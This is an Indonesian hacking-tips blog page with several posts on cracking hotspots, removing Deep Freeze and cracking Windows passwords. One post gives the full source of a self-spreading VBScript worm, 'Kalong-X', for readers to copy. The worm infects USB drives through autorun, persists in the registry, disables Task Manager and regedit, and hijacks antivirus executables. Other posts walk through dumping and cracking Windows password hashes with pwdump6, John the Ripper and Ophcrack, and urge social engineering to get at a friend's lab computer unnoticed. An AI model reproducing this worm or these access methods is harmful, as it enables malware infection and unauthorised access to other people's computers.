29 Agustus 2008

Tips Bobol Hot Spot
Share 0 komentar

Aku baru dapet info baru nih. Mungkin ini yang di nanti oleh para pemburu akses gratisan dan para penguna lappie yang suka sama gratisan akses internet. Akses sepuasnya tanpa halangan dan tanpa batas (kecuali batasan batere hehe). Moga-moga bermanfaat...
  1. Ada yang bilang pake Easy WiFi Radar. Tapi ini hanya hotspot yang tidak terkunci saja tapi boleh deh temen temen mencobanya.Video : www.youtube.com search : "easy wifi". Download: www.makayama.com/EasyWifiRadar.zip
  2. Ada lagi yang bilang pake AirSNORT. Software ini sangat mudah di gunakan kalo boleh di bilang anak umur 10 tahun yang ngerti komputer aja dah bisa make nya. Nama AirSNORT di ambil dari penciptanya sendiri. Pada peluncuran software ini si pembuat menjelaskan bahwa software ini sebenernya di buat untuk mengungkap atau mengetes suatu web key rahasia baik yang 64 bit, 128bit dan yang lebih tinggi lagi 256bit serta WPA. tapi disayangkan para penguna windows g bisa make di windows. Tapi ada hembusan kabar lagi katanya udah keluar kok versi windowsnya, namanya WinAirSnort plus sama tutorial dan artikelnya Kelebihan tools ini bersifat GUI dan sangat easy lo. Katanya software ini mudah banget kaya di windows windows gitu, tinggal klik dan dapet deh keynya. Download : www.wireless.phpnet.us/image/orinoco%20ver2-128bit.jpg
  3. Yang trahir namanya AirDamp.Bener bener susah dan rumit. Tapi menurut gosip ini yang paling top, bayangkan dengan tools ini mampu membongkar sistem keamanan sebanyak 26 angka atau 128 bit .

Read More | Goto Top

BUAT VIRUS VBS ALA NOTEPAD
Share 0 komentar

Kita akan membuat virus via notepad. Pertama buka dulu notepad. Lalu ketik deh sekarang kode dibawah ini Jika malas kan tinggak Copy > Paste….

‘Kalong-X
‘Varian dari Kalong.VBS
on error resume next

‘Dim kata-kata berikut
dim rekur,windowpath,desades,fs,mf,isi,tf,kalong,nt,check,sd

’siapkan isi autorun
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6ms32.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘buat file induk
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs “)
tf.attributes = 32
set tf = fs.createtextfile(windowpath & “\k4l0n6-x.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs”)
tf.attributes = 39

’sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in fs.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then

set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(desades.path &”\k4l0n6ms32.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes = 39

set tf =fs.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘Manipulasi Registry
set kalong = createobject(”WScript.Shell”)

‘Ubah IE Title
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: ->KALONG-X<- ::”

‘File Hidden tak terlihat
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”

‘Blokir Find, FolderOptions, Run, Regedit, Task Manager, dan klik kanan
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘Buat pesan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “THE KALONG-X”
kalong.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,”No reason for Panic”

‘Aktifkan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs”

‘Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”notepad.exe”

‘Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama k4l0n6ms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan KALONG-X.VBS di komputer Anda.
Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe maka akan terbuka Notepad yang isinya kurang lebih mirip seperti ini :

Ingat jadilah orang yang bermanfaat bagi orang lain. Tidak ada “barang berbahaya” disini karena Andalah yang membuatnya berbahaya. Saya tidak bertanggung jawab apabila Anda menyalahgunakan kode ini. Ini untuk ilmu pengetahuan semata. Kalau disalahgunakan saya kutuk mukanya mirip Tukul (Wah…jadi terkenal nanti)…jangan deh. Pokoknya segala kenekatan Anda ditanggung oleh Anda sendiri.
Virus ini punya kemampuan Autorun jadi komputer yang dicolokkan Removable Disc (Mislanya Flash Disc) yang terinfeksi virus ini akan diinfeksi pula (jika Autorun tidak di non-aktifkan)
NOTE: Untuk membersihkan Kalong-X caranya mudah. Tinggal hentikan proses yang bernama wscript.exe. Jika di WinNT Anda bisa melakukannya lewat Task Manager. Tapi kalau Win9X silahkan cari tool pengganti Task Manager misalnya Procexp atau CurrProcess. Soalnya terkadang kalau lewat perintah Command Prompt gak bisa.
Setelah Anda memberhentikan proses wscript.exe hapus file induk yang bernama k4l0n6-x.dll.vbs di WINDOWSDIR (C:\Windows misalnya). Jika tidak ada tampilkan dulu file hidden dengan Folder Options. Setelah itu perbaiki Registry. Untuk mempercepat salin kode ini ke Notepad :
[Version]
Signature=”$Chicago$”
Provider=Fariskhi

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, “INTERNET EXPLORER”

[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger

Setelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : kalongxremoval.inf. Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan Notepad.ini adalah tutorial milik teman aku tapi tenang aja da kurubah sintak programnya di di bagian regisry nya kaliii

Read More | Goto Top

28 Agustus 2008

Download PC Media 1.6 Build 3
Share 0 komentar

PC Media anti virus telah merilis database virus yang baru. Saat ini sudah PC Media 1.6 Build 3. bagi temen-temen yang ingin mengambilnya, silahkan download langsung pada Mirror dibawah ini.

Miror 1 :
Download PCMAV Click disini

Miror 2 :
Download PCMAV Click disini

Read More | Goto Top

Seribu Cara Habisi Deep Freeze
Share 0 komentar

Deep Freeze memang aplikasi “aneh bin ajaib”. Aplikasi ini bisa “membekukan” harddisk sehingga perubahan-perubahan yang terjadi pada system akan lenyap saat komputer di restart. Namun, saat kita mencoba mengUninstallnya, seringkali kita mengalami kesulitan. Belum lagi kalau kita lupa passwordnya.
Di bawah ini akan saya coba ulas berbagai tips untuk menghabisi Deep Freeze yang saya kumpulkan dari beberapa sumber. Semoga bisa membantu anda.

============Pake xDeepFreeze=============
1. Download xDeepFreeze di sini.
2. ekstrak ke C:\xDeepFreeze
3. Jalankan file Run_Me.exe. Muncul file “mcr.bat” dan “XDeepFreeze.exe” akan terload.
4. Pada XDeepFreeze, Tekan “Stop DeepFreeze”, untuk menghentikan “frzstate.exe”
5. Bersihkan registry yang dibuat Deep Freeze saat instalasi, tekan “Clean Registry”.
6. Jalankan command.com di folder C:\xDeepFreeze
7. Jalankan mcr.bat. Ini akan membersihkan file “persifrz.vxd”.
8. Klik Exit. Deep Freeze tinggal sejarah.

============Pake Deep Unfreezer (Deep Freeze dibawah v.6)=============
1. Download Deep Unfreezer di sini.
2. Jalankan aplikasi. Klik Load Status.
3. Pilih Boot Thawed. Klik Save Status.
4. Reboot
<
============Pake PE Builder (Live CD Windows)=============
Cara yang satu ini saya kutip dari Wikianswer. Aplikasi yag harus disiapkan adalah PE Builder. Anda bisa mendapatkannya di sini. Selain itu, anda membutuhkan file instalasi Windows (XP Home/ Pro dengan minimal SP 1 atau Server 2003).
Langkah-langkah yang harus dilakukan cukup panjang. Pertama-tama, kita harus membuat CD Startup Windows.
1. Pastikan sistem memiliki ruang kosong 500 MB.
2. Copy file instalasi Windows ke folder khusus di Harddisk.
3. Install PE Builder, lalu jalankan aplikasi ini.
4. Setelah menyetujui License Agreement, akan muncul tampilan utama PE Builder.
5. Masukkan lokasi file instalasi Windows.
6.Pada dialog PE Builder, pilih opsi “Burn CD/DVD”. Ketika anda menggunakan CD RW (bisa dihapus), pastikan bahwa pilihan “AutoErase RW” diaktifkan. Pilihan “burn using” harus diset ke “StarBurn”. Kalau anda ingin CD otomatis dikeluarkan setelah proses burning selesai, centangi “Eject after burn”. Pilih cd writer anda dari daftar device.
7. klik “build”. PE builder akan meminta ijin membuat direktori BartPE, jawab Yes.
8. Lisensi dari Microsoft Windows tampil. Baca dan pilih agree untuk melanjutkan.
9. Tunggu sampai selesai.
Langkah selajutnya, silakan retart komputer dan masuk ke BIOS. Ubah urutan booting agar boot melalui CD. Setelah masuk ke live CD Windows, lakukan langkah-berikut.
1. Jalankan regedit.
2. Buka menu Find dan masukkan “UpperFilters”. Jangan lupa centangi “only the Values”.
3. Jika telah ditemukan, lihat apakah terdapat baris yang mencantumkan driver Deep Freeze (DeepFrz atau DepFrzLo) lalu hapus. hapis juga baris untuk ThawSpace (ThwSpace), biarkan sisanya. Tekan F3 untuk melanjutkan pencarian dan ulangi proses diatas sampai value UpperFilters tidak ada di key HKLM\MySystem.
4. Tuju ke HKLM\MySystem\Select lalu buka value bernama Default. Di sini terdapat key untuk control set yang akan digunakan system saat booting. Jika nilainya 1 maka akan tertulis ControlSet001, jika 2 akan tertulis ControlSet002, dst. Ingat control set itu
5. Lalu tuju ke HKLM\MySystem\ControlSetXXX(sesuai default)\Services lalu hapis key yang bernama driver Deep Freeze (DeepFrz atau DepFrzLo dan DepFrzHi). Lalu hapus juga driver ThawSpace (ThwSpace).
6. Reboot system secara normal.
7. Selesai sudah.
Bila ada langkah-langkah yang kurang jelas, silakan periksa referensi.

Referensi:
Lumpuhkan Deep Freeze
Virologi.info
Wikianswer
Bootable Live Windows

Read More | Goto Top

Bobol Password Windows Dengan Emergency Boot CD (EBCD)
Share 0 komentar

Emergency Boot CD (EBCD) adalah aplikasi untuk menangani kerusakan pada Windows. Aplikasi ini memiliki beberapa fungsi antara lain:
1. Melakukan emergency boot untuk Win NT/2000/XP. Ini berguna saat salah satu file system rusak hingga menyebabkan gagal boot.
2. Mengembalikan master boot record(MBR) di HDD.
3. Mengubah password user tanpa harus tahu password sebelumnya
4. Mengembalikan file yang terhapus dari Recycle Bin, atau sebaliknya menghapus total file agar tidak bisa dikembalikan lagi.
5. Mengembalikan data dari hard disk dan disket yang terformat.

Aplikasi ini bisa anda download di sini. Setelah selesai, lakukan instalasi. Buka folder instalasi lalu jalankan makeebcd.exe. Anda akan mendapatkan file image (iso) kira-kira 60 MB.
Untuk mendapatkan password Windows, ikuti langkah berikut.


1. Bakar file iso anda.
2. Ubah pengaturan boot agar boot pertama dari CD. Masukkan CD lalu boot.
3. Pada menu utama pilih opsi (5) NT Passoword editor (Linux-based).
4. Akan muncul pesan ” Swap to SCSI-drivers disk now if needed…”. Tekan saja Enter.
5. Akan muncul daftar partisi seperti ini.
Device Boot Start End Blocks
/dev/hda1 * 1 … …….
/dev/hda2
/dev/hda3
dimana tanda bintang (*) merupakan partisi file system.
6. Masukkan nama partisi tersebut.
7. Akan muncul pertanyaan What is the full path to the registry directory?. Tekan Enter.
8. Muncul daftar file. tekan saja Enter.
9. Muncul menu =====Chntpw Main Interactive Menu ======
Pilihan 1 (Edit user data and password) terpilih secara default. Tekan saja Enter.
10. Akan muncul daftar berjudul ====Chntpw Edit User Info & Passwords ====. Disertai daftar user dan password. Akun dengan tambahan *Disabled or Locked* adalah akun terpassword. Masukkan nama akun yang akan anda bobol passwordnya.
11. Masukkan password baru atau ketik saja “*” untuk mengosongkan passwordnya. JANGAN dibiarkan kosong karena itu sama saja tidak mengubah password.
12. Set password ke “never expire”. Muncul pertanyaan Do you really wish to change it?. Tekan “Y” lalu Enter.
13. Pilih “!” untuk kembali ke menu utama. Lalu tekan “q” untuk keluar.
14. Akan muncul pertanyaanWrite hive files?, tekan “y”.
15. Tekan “y” lagi pada pertanyaan berikutnya.
16. Reboot, jangan lupa keluarkan CD.

Referensi:
EBCD
Password Hacking Programs: EBCD
EBCD: System Recovery Boot CD

Read More | Goto Top

Hack Windows XP Password dengan Ophcrack
Share 0 komentar

Sebelumnya saya pernah membuat tutorial mengenai Hack Windows XP (SP2) Passwords menggunakan pwdump6. Namun, cara tersebut mengharuskan user dengan status admin agar dapat ‘dump’ file HASH dari Windows. Sekarang saya akan menyampaikan cara lain untuk ‘cracking’ password Windows XP (semua versi) dengan menggunakan Ophcrack.

Ophcrack is a Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a GTK+ Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as on Linux.

Hebatnya lagi, Ophcrack tersedia dalam bentuk LiveCD, sehingga tidak diperlukan proses instalasi dan tidak perlu password admin, hanya butuh akses agar komputer dapat booting dari CD (biasanya urutan booting default BIOS komputer saat ini dimulai dari CD/DVD ROM, so don’t worry) :-D . Ophcrack LiveCD merupakan Linux yang berbasis SLAX (turunan dari Slackware) dan sudah terdapat Ophcrack dan Rainbow Table untuk cracking password alpanumerik.

Intinya hampir sama dengan cara kerja pwdump6, namun karena Ophcrack menggunakan linux LiveCD sehingga dapat langsung mount file sistem Windows tanpa perlu login ke Windows serta membaca file Hash (windows\system32\config) dan melakukan dump ke file text biasa yang kemudian dapat langsung di crack. Dan hebatnya, tidak perlu Tools seperti JTR lagi, karena crack dilakukan dengan Ophcrack menggunakan Rainbow Table dan memberikan hasil yang sangat cepat.

Ok.. langsung aja kita praktek, tapi sebelumnya pasang disclaimer dulu ah… biar bisa ‘lepas’ tanggung jawab kalau tutorial ini disalahgunakan oleh pihak lain :-P

Disclaimer:

This document was written in the interest of education and care of awareness for unaware people. The author cannot be held responsible for how the topics discussed in this document are applied.

Lets Begin

Pertama kali anda harus mendownload file ISO Ophcrack LiveCD dari sini. Lalu burn ke dalam CD. Dan selanjutnya boot Komputer ‘target’ dari Ophcrack LiveCD, maka akan tampak seperti ini :

boot.JPG

Tekan Enter dan biarkan proses Booting berlangsung. Ophcrack akan otomatis masuk ke windows manager menggunakan fluxbox dan langsung menjalankan Ophcrack. Proses pertama adalah mendapatkan file HASH dari partisi yang berisi file Windows kemudian di dump ke file /tmp/ophcrack.tmp

dump.JPG

Kemudian tunggu beberapa saat untuk melakukan cracking.

Saya melakukan pengujian menggunakan spesifikasi sebagai berikut : Prosessor AMD +2000 1.6 Ghz, Memori 256 Mb dan dijalankan menggunakan VM-Ware.

Lalu saya menggunakan password yang sangat sederhana, yaitu ‘password123′ dan ‘password’. Hasilnya, Ophcrack mampu menebak kedua password dengan tepat dan hanya membutuhkan waktu 1 Menit!!

Lalu saya coba untuk mengkombinasikan huruf, angka dan simbol dengan memberikan password : ‘p4ssw0rd’ dan ‘p4ssw0rd~!@#’. Hasilnya, Ophcrack mampu menebak ‘p4ssw0rd’ dengan waktu 8 menit dan tidak dapat menemukan ‘p4ssw0rd~!@#’.

hasil.JPG

Selain menggunakan CD, dengan sedikit modifikasi, Ophcrack juga dapat dijalankan melalui USB Flashdisk. Caranya dengan menginstall SLAX ke dalam USB Flashdisk dan menambahkan modul ophcrack di SLAX serta menyalin Rainbow Tables ke dalam USB, maka Ophcrack LiveUSB sudah dapat dijalankan :-D

Selain itu, untuk mempersingkat waktu, kita dapat mengambil file HASH terlebih dahulu yang terletak di /tmp/ophcrack.tmp kemudian baru di crack di tempat lain tanpa perlu menunggu lagi di komputer target. :-D

Saran

Ibarat pisau bermata dua, Ophcrack dapat menjadi sangat berguna ketika ada seseorang yang lupa password Windows dan ingin me-recovery password dengan cepat dan mudah. Namun disisi lain, Ophcrack dapat juga menjadi ’senjata’ ampuh bagi cracker untuk menjebol Windows dengan cara yang sangat mudah dan cepat. Bahkan kabarnya Ophcrack ini merupakan tools yang paling cepat untuk crack password Windows. Untuk itu ada beberapa hal yang dapat mengurangi resiko agar password komputer kita tidak ‘dibobol’ dengan mudah.

1. Setting password BIOS komputer dan atur urutan boot agar tidak melakukan booting pertama kali dari CD atau USB.

2. Gunakan password yang terdiri dari huruf+angka+simbol agar tidak mudah di crack.

Oph… Crack!! :-D

Read More | Goto Top

Hack Windows XP (SP2) Passwords
Share 0 komentar

Apakah anda pernah menggunakan komputer di Lab atau pinjam komputer teman atau bahkan menggunakan komputer di tempat umum? Nah, biasanya klo di Lab (berdasarkan pengalaman pribadi) komputer pasti di-password dan jika ingin masuk harus tanya dulu ke sang empunya. Nah, sekarang kita dapat melihat password dari komputer yang kita gunakan tanpa merestart komputer atau pun tanpa menginstall program apapun seperti Cain, L0pthCrack, dsb. Hanya dibutuhkan sedikit ‘kepercayaan’ untuk meminjam komputer (istilah kerennya social engineering) dan 2 buah program, yaitu pwdump6 dan john the ripper. Tapi klo kebetulan ada login umum dengan tipe administrator, itu namanya Hoki! ga perlu cape2 pinjam login teman lagi :-D.
Sebelumnya mungkin anda pernah mendapatkan tutorial mengenai cara menge-hack password user yang ada Windows XP atau NT menggunakan pwdump. Yup, mungkin tutorial ini akan mirip dengan bagaimana cara menge-hack Windows XP, terutama Windows XP SP2. Lalu apa bedanya dengan tutorial yang lain? Saat ini Windows XP SP2 (atau mungkin juga SP1, CMIIW), menggunakan Syskey untuk memproteksi agar HASH (tempat menyimpan password yang dienkripsi) tidak dapat dibaca dan didump menggunakan pwdump atau samdump. Untuk lebih jelasnya berikut penjelasan mengenai Syskey [1]

Syskey is a Windows feature that adds an additional encryption layer to the password hashes stored in the SAM database. The main purpose of this feature is to deter ‘offline’ attack. In fact one of the most common ways to gather passwords is to copy the system SAM database and then use one of the many good password crackers to “recover” the passwords; of course physical access is almost always required. So with syskey the attacker needs to remove the additional encryption layer to get the password hashes.

Jika dulu mungkin di Windows NT atau XP (sebelum SP2), kita masih bisa menggunakan pwdump atau bahkan langsung dengan KaHT, maka untuk Windows XP SP2 cara tersebut tidak dapat digunakan lagi (mungkin lebih tepatnya, pwdump tersebut tidak dapat digunakan lagi). Nah disinilah letak perbedaan dengan tutorial sebelumnya. Jika sebelumnya kita menggunakan pwdump versi lama, maka sekarang digunakan pwdump6 yang dikembangkan oleh fizzgig and the foofus.net Team. Kalau baca README dari pwdump6 ini, maka pwdump6 adalah :

pwdump6 is a password hash dumper for Windows 2000 and later systems. It is capable of dumping LanMan and NTLM hashes as well as password hash histories. It is based on pwdump3e, and should be stable on XP SP2 and 2K3. If you have had LSASS crash on you using older tools, this should fix that.

A significantly modified version of pwdump3e, this program is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is turned on. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file

Oh iya, agar pwdumpd6 dapat dijalankan dan mendapatkan HASH file dibutuhkan account yang mempunyai akses setara dengan Administrator. Nah, oleh karena itu kita harus menjalankan sedikit social engineering. Bilang aja ketemen kita, klo mengakses workgroup, tapi ga bisa klo pake login biasa. Tapi tenang aja, biasanya secara default orang-orang kebanyakan mebuat user dengan tipe account Administrator. Atau gunakan berbagai macam cara, daya, upaya maupun rayuan agar kita bisa dapat login terlebih dulu.

Jika udah punya akses dengan login tipe adiministrator, cara selanjutnya adalah tinggal menjalankan pwdump6. Jika anda punya flashdisk, simpan dan bawa terus pwdump6 ini kemanapun ada pergi, siapa tahu berguna suatu saat.. :-D. Ok, langsung aja kita jalankan pwdump6 ini. Sebaiknya copy dulu pwdump6 ke Hardisk (jangan dijalankan dari flashdik). Sebelumnya downlod dulu pwdump6 ini dari sini atau download dari mirror situs saya disini.

1. Jalankan CMD (Run->cmd)

2. Jalankan pwdump6 seperti berikut (misalnya PwDump6 berada di folder D:\PwDump6)

D:\PwDump6>PwDump.exe -o pass.txt 127.0.0.1

pwdump6 Version 1.3.0 by fizzgig and the mighty group at foofus.net
Copyright 2006 foofus.net

This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.

Using pipe {C411BDE9-594E-47F4-99B5-E94ADF194A45}
Key length is 16
Completed.

3. Setelah itu akan didapatkan file pass.txt yang berisi daftar user dan password yang masih dienkripsi. Contohnya akan tampak seperti berikut :

ach:1003:2BFA42D08601B951ABD697149E2F5967:73098347042E9109FA584CE843018F4F:::
Administrator:500:934A4750EC9859B3EA397B0F6EC18E34:732BD09D6834DA4A5A30300A6A045BF8:::
coba:1004:FBE4F28EE205F0BA79999C25263AA9AA:A69C199A4DF77CD41FCA6EA916A93868:::
Guest:501:NO PASSWORD********************* :NO PASSWORD*********************:::
HelpAssistant:1000:B3D2AE56C93F27B43C4F8419B1A21E9B: DC3DBB258A10B0C7EA9D92133267B905:::
SUPPORT_388945a0:1002:NO PASSWORD*********************: DF1DB672DA1B5C045ECA2490CA753D3B:::

4. Yosh!! password sudah ditangan. Proses selanjutnya adalah menge-crack file pass.txt dengan bantuan John The Ripper. Sebaiknya simpan dulu file pass.txt ke USB atau upload ke tempat yang aman, karena proses cracking ini bisa dilakukan kapan saja dan dimana saja. Berdasarkan pengalaman, kalau passwordnya tidak terlalu sulit ditebak seperti “adminkeren”, “qwerty123″, biasanya dibutuhkan waktu yang tidak terlalu lama untuk mengecracknya lewat John The Ripper. Tapi kalau password menggunakan kombinasi yang aneh-aneh seperti “P4ssW0rD”, “S03S4h”, dsb, biasanya membutuhkan waktu lama, bisa ditinggal tidur atau maen aja dulu. Ok, sekarang gini nih cara ngecraknya.

Download John The Ripper untuk Windows disini. Untuk komputer yang menggunakan Prosesor AMD, sebaiknya menggunakan “john-mmx.exe”. Atau bagi yang menggunakan intel atau AMD, dapat menggunakan “John-386.exe”. Sebelumnya copy file pass.txt ke dalam folder tempat “John-mmx.exe” atau “John-386.exe” berada (John171w\john1701\run). Setelah itu tinggal jalankan perintah berikut dan tunggu dengan sabar :

D:\john171w\john1701\run>john-mmx.exe pass.txt
Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])
REN123 (Administrator:2)
TEBAK (coba:2)
ADMINKE (Administrator:1)
MUDAHDI (coba:1)

Yosh!! sekarang passwordnya sudah terlihat secara kasat mata. Jadi password untuk user “Administrator” adalah “adminkeren123″, diperoleh dari menggabungkan Administrator:2 dan Administrator:2.

Administrator:1+Administrator:2 = adminkeren123

Sedangkan untuk user “coba” adalah “mudahditebak”!!

Mudah bukan? Intinya sih tinggal ambil HASH file (password yang dienkripsi) menggunakan pwdump6 lalu crack hasilnya dengan John The Ripper.

Nah, sekarang kalau kita mau pakai komputer teman di Lab, ga usah cari2 orangnnya lagi. Tinggal pake aja langsung user Admin lagi, tapi jangan sampai ketahuan ama dia….. :-D Atau klo anda lupa password Administrator, tidak perlu mereboot komputer, lalu mereset password anda. Tinggal ikut langkah2 diatas aja!

Read More | Goto Top

27 Agustus 2008

Analisa Lengkap Virus Windx-Maxtrox pada PCMAV 1.6 Update Build3
Share 0 komentar

Virus Windx-Matrox generasi terbaru ini cukup banyak dilaporkan oleh pembaca PC Media dan menyebar luas di Indonesia. Virus ini secara teknis cukup menarik dan memiliki tantangan tersendiri dalam menganalisanya karena membawa beberapa teknik baru yang termasuk kompleks. Cara penginfeksian file pun dilakukan secara cerdik dan menggunakan teknik enkripsi. Bahkan antivirus luar yang heuristiknya termasuk paranoid tidak mampu mendeteksi kehadiran virus ini di file yang terinfeksi.

Sepengetahuan kami, sampai tulisan ini dibuat, tidak ada satupun antivirus di dunia yang mampu mengatasi virus ini secara tuntas, termasuk memulihkan file executable yang terinfeksi. Justru antivirus yang ada saat ini malah menghapus file Anda yang telah terinfeksi Windx-Maxtrox.

Pembersihan manual yang digembar-gemborkan ke beberapa media massa di Indonesia kami nilai tidak banyak membantu mengatasi virus ini secara tuntas. Sayangnya lagi, niat baik pihak tersebut dalam menginformasikan virus ini ke media massa tidak diimbangi oleh kemampuan teknis yang baik dan memadai dalam men-disassembly dan mendekrip virus ini secara menyeluruh. Akibatnya, beberapa informasi untuk membersihkan virus ini malah berakibat fatal yang akan menyebabkan file yang terinfeksi justru terhapus, bukan dipulihkan.

